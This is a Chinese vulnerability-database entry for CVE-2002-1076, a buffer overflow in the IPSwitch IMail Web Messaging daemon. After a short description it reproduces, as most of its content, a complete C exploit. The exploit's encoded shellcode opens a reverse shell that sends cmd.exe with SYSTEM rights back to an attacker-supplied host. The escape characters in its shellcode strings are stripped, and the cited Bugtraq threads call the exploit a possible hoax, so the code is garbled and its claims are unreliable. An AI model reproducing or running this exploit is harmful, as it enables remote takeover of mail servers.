IPSwitch IMail Web Messaging守护程序HTTP GET远程缓冲区溢出漏洞
漏洞ID | 1106873 | 漏洞类型 | 未知 |
发布时间 | 2002-07-25 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2002-1076 |
CNNVD-ID | CNNVD-200210-145 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
IMail是一款由Ipswitch公司开发和维护的商业电子邮件服务程序,IMail可使用在Microsoftwindows操作系统下。IMail的WebMessaging守护程序在处理HTTP/1.0GET请求时对参数缺少正确的检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。IMail的WebMessaging守护程序在处理HTTP/1.0类型GET请求时缺少正确的缓冲边界检查,攻击者可以提交包含超过96个字节的字符串作为GET的参数请求给WebMessaging守护程序处理,可导致产生缓冲区溢出,精心构建提交的字符串数据可以IMailWEBMessaging守护程序进程的权限在系统中执行任意指令。IMail的WebMessaging守护程序在处理HTTP/0.9&HTTP/1.1GET请求时不存在此漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/5323/info
IMail is a commercial email server software package distributed and maintained by Ipswitch, Incorporated. IMail is available for Microsoft Operating Systems.
The web messaging server is vulnerable to a buffer overflow. When the server receives a request for HTTP version 1.0, and the total request is 96 bytes or greater, a buffer overflow occurs. This could result in the execution of attacker-supplied instructions, and potentially allow an attacker to gain local access.
** Ipswitch has reported they are unable to reproduce this issue. In addition, Ipswitch has stated that the supplied, third party patch may in fact open additional vulnerabilities in the product. Ipswitch suggests that users do not apply the supplied patch.
/*
imailexp.c
July 25th, 2002
IPSwitch IMail 7.11 remote 'SYSTEM' exploit
there is an overflow in the GET parameter under the HTTP/1.0
specification in the Web Messaging daemon in all IMail versions
to date
<96 bytes><EBP><EIP>
since none of the registers point to our payload on ret some
trickery was necessary to hit our payload in a dynamic way,
but nothing difficult..
execution flow:
eip overran, ret (esp-4) -> land at pop ebx, ret10 (esp-18) -> call esp
reach corrupted payload
preserve esp -> sub esp -> jmp esp
preserve esp, and jump to good payload
recover esp -> execute shell
let shit fly
"In 1995, Ipswitch released IMail Server, the first commercial NT Mail Server.
Seven years later there are over 49 million users of IMail worldwide.
IMail Server 7.1
Greater security, improved usability, and new revenue opportunities for service
providers."
7 years in development, 20 minutes of BuffSex v0.3(tm), 4 remote 'root' holes
2c79cbe14ac7d0b8472d3f129fa1df55 ([email protected])
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>
// dark spyrit's shell as per usual.. queerly modified to call ExitThread
// yet again.. all that shit on top is to get us home
unsigned char payload[] =
"x47x45x54x20x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x24x01x10x90x90x90x90x13xf7x02x10"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x8bxfcx81xc4x11x11x11x11x81xec"
"x50xddx10x11xffxe4x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x8bxe7xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90x90"
"x8bxc5x33xc9x66xb9xdbx02x50x80x30x95x40xe2xfax2dx95x95"
"x64xe2x14xadxd8xcfx05x95xe1x96xddx7ex60x7dx95x95x95x95"
"xc8x1ex40x14x7fx9ax6bx6ax6ax1ex4dx1exe6xa9x96x66x1exe3"
"xedx96x66x1exebxb5x96x6ex1exdbx81xa6x78xc3xc2xc4x1exaa"
"x96x6ex1ex67x2cx9bx95x95x95x66x33xe1x9dxccxcax16x52x91"
"xd0x77x72xccxcaxcbx1ex58x1exd3xb1x96x56x44x74x96x54xa6"
"x5cxf3x1ex9dx1exd3x89x96x56x54x74x97x96x54x1ex95x96x56"
"x1ex67x1ex6bx1ex45x2cx9ex95x95x95x7dxe1x94x95x95xa6x55"
"x39x10x55xe0x6cxc7xc3x6axc2x41xcfx1ex4dx2cx93x95x95x95"
"x7dxcex94x95x95x52xd2xf1x99x95x95x95x52xd2xfdx95x95x95"
"x95x52xd2xf9x94x95x95x95xffx95x18xd2xf1xc5x18xd2x85xc5"
"x18xd2x81xc5x6axc2x55xffx95x18xd2xf1xc5x18xd2x8dxc5x18"
"xd2x89xc5x6axc2x55x52xd2xb5xd1x95x95x95x18xd2xb5xc5x6a"
"xc2x51x1exd2x85x1cxd2xc9x1cxd2xf5x1exd2x89x1cxd2xcdx14"
"xdaxd9x94x94x95x95xf3x52xd2xc5x95x95x18xd2xe5xc5x18xd2"
"xb5xc5xa6x55xc5xc5xc5xffx94xc5xc5x7dx95x95x95x95xc8x14"
"x78xd5x6bx6ax6axc0xc5x6axc2x5dx6axe2x85x6axc2x71x6axe2"
"x89x6axc2x71xfdx95x91x95x95xffxd5x6axc2x45x1ex7dxc5xfd"
"x94x94x95x95x6axc2x7dx10x55x9ax10x3fx95x95x95xa6x55xc5"
"xd5xc5xd5xc5x6axc2x79x16x6dx6ax9ax11x02x95x95x95x1ex4d"
"xf3x52x92x97x95xf3x52xd2x97x80x26x52xd2x91x55x3dx95x94"
"xffx85x18x92xc5xc6x6axc2x61xffxa7x6axc2x49xa6x5cxc4xc3"
"xc4xc4xc4x6axe2x81x6axc2x59x10x55xe1xf5x05x05x05x05x15"
"xabx95xe1xbax05x05x05x05xffx95xc3xfdx95x91x95x95xc0x6a"
"xe2x81x6axc2x4dx10x55xe1xd5x05x05x05x05xffx95x6axa3xc0"
"xc6x6axc2x6dx16x6dx6axe1xbbx05x05x05x05x7ex27xffx95xfd"
"x95x91x95x95xc0xc6x6axc2x69x10x55xe9x8dx05x05x05x05xe1"
"x09xffx95xc3xc5xc0x6axe2x8dx6axc2x41xffxa7x6axc2x49x7e"
"x1fxc6x6axc2x65xffx95x6axc3x98xa6x55x39x10x55xe0x6cxc4"
"xc7xc3xc6x6ax47xcfxccx3ex77x7bx56xd2xf0xe1xc5xe7xfaxf6"
"xd4xf1xf1xe7xf0xe6xe6x95xd9xfaxf4xf1xd9xfcxf7xe7xf4xe7"
"xecxd4x95xd6xe7xf0xf4xe1xf0xc5xfcxe5xf0x95xd2xf0xe1xc6"
"xe1xf4xe7xe1xe0xe5xdcxfbxf3xfaxd4x95xd6xe7xf0xf4xe1xf0"
"xc5xe7xfaxf6xf0xe6xe6xd4x95xc5xf0xf0xfexdbxf4xf8xf0xf1"
"xc5xfcxe5xf0x95xd2xf9xfaxf7xf4xf9xd4xf9xf9xfaxf6x95xc2"
"xe7xfcxe1xf0xd3xfcxf9xf0x95xc7xf0xf4xf1xd3xfcxf9xf0x95"
"xc6xf9xf0xf0xe5x95xedxedxedxedxedxedxedxedxedxedxedx95"
"xd6xf9xfaxe6xf0xddxf4xfbxf1xf9xf0x95xc2xc6xdaxd6xdexa6"
"xa7x95xc2xc6xd4xc6xe1xf4xe7xe1xe0xe5x95xe6xfaxf6xfexf0"
"xe1x95xf6xf9xfaxe6xf0xe6xfaxf6xfexf0xe1x95xf6xfaxfbxfb"
"xf0xf6xe1x95xe6xf0xfbxf1x95xe7xf0xf6xe3x95xf6xf8xf1xbb"
"xf0xedxf0x95xc9x1dxdcx95x20x48x54x54x50x2Fx31x2Ex30x0d"
"x0ax0dx0a";
main(char argc, char **argv){
unsigned long ah;
unsigned short int ap;
int fd, i;
int bufsize = 1024;
int *buffer = (int *)malloc(bufsize);
struct sockaddr_in sin;
struct hostent *he;
struct in_addr in;
printf("IMail 7.11 remote exploit (SYSTEM level)n");
printf("2c79cbe14ac7d0b8472d3f129fa1df55 ([email protected])nn");
if (argc < 5){
printf("usage: %s <targethost> <iwebport> <localhost> <localport>nn", argv[0]);
printf("iwebport: IMail Web Messaging port (default 8383)nn");
exit(-1);
}
ap = htons(atoi(argv[4]));
ap ^= 0x9595;
if ((he = gethostbyname(argv[3])) == 0){herror(argv[2]);exit(-1);}
ah = *((unsigned long *)he->h_addr);
ah ^= 0x95959595;
payload[747] = ((ap) & 0xff);
payload[748] = ((ap >> 8) & 0xff);
payload[752] = ((ah) & 0xff);
payload[753] = ((ah >> 8) & 0xff);
payload[754] = ((ah >> 16) & 0xff);
payload[755] = ((ah >> 24) & 0xff);
if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}
if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}
else
if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
sin.sin_port = htons(atoi(argv[2]));
printf("ret: 0x10012490 (IMailsec.dll v.2.6.17.28)nn");
printf("connecting...");
if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}
printf("done.n");
sleep(1);
printf("dumping payload...");
if(write(fd, payload, strlen(payload)) < strlen(payload)){perror("write error");exit(-1);}
printf("done.nn");
printf("cmd.exe spawned to [%s:%s]nn", argv[3], argv[4]);
close(fd);
}
|参考资料
来源:BID
名称:5323
链接:http://www.securityfocus.com/bid/5323
来源:XF
名称:imail-web-messaging-bo(9679)
链接:http://www.iss.net/security_center/static/9679.php
来源:support.ipswitch.com
链接:http://support.ipswitch.com/kb/IM-20020731-DM02.htm
来源:support.ipswitch.com
链接:http://support.ipswitch.com/kb/IM-20020729-DM01.htm
来源:BUGTRAQ
名称:20020729Re:HoaxExploit(2c79cbe14ac7d0b8472d3f129fa1df55RETURNS)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0368.html
来源:BUGTRAQ
名称:20020729HoaxExploit
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0363.html
来源:BUGTRAQ
名称:20020725IPSwitchIMailADVISORY/EXPLOIT/PATCH
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0326.html
相关推荐: Cisco OSM Line Cards Denial Of Service Vulnerability
Cisco OSM Line Cards Denial Of Service Vulnerability 漏洞ID 1101170 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2002-12-11 更新…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666